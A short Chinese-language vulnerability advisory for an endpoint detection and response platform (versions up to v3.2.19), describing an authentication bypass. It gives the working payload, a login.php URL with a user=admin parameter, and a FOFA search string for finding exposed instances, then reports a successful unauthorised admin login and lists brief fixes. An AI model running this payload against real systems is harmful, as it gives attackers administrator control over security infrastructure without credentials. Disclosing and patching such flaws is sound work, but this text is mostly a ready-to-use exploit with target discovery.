一、漏洞描述
終端檢測響應平台EDR,圍繞終端資產安全生命周期,通過預防、防御、檢測、響應賦予終端更為細致的隔離策略、更為精准的查殺能力、更為持續的檢測能力、更為快速的處置能力。在應對高級威脅的同時,通過雲網端聯動協同、威脅情報共享、多層級響應機制,幫助用戶快速處置終端安全問題,構建輕量級、智能化、響應快的下一代終端安全系統。
攻擊者可以通過構造payload繞過登錄判斷,直接拿到系統管理員/用戶權限。
二、漏洞影響版本
<=v3.2.19
三、漏洞驗證
payload:https://ip:xx/ui/login.php?user=任意用戶名 注:用戶名需要存在
1、fofo搜索 title="終端檢測響應平台",訪問
2、構造payload,訪問https://ip:xx/ui/login.php?user=admin,成功未授權登錄,查看當前版本發現為3.2.13
四、漏洞修復建議
1、部署到內網
2、限制特定IP地址訪問
3、打補丁